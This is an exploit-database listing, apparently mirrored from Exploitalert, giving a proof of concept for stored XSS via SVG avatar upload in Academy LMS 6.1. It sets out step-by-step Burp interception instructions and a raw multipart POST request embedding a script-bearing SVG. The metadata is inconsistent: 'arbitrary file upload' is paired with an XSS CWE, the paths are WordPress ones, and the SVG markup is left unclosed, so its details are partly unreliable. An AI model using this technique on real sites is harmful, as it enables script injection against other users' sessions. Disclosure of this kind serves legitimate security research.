Academy LMS 6.1 - Arbitrary File Upload

CVE Category Price Severity
CVE-2021-40847 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-08-19
Our sensors found this exploit at:

Below is a copy:

Academy LMS 6.1 - Arbitrary File Upload
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage:
# Software Link:
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707

## Description

Allows Attacker to upload malicious files onto the server, such as Stored XSS

## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

POST /wp-admin/async-upload.php HTTP/2

Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by CraCkEr");

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg

[-] Done

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum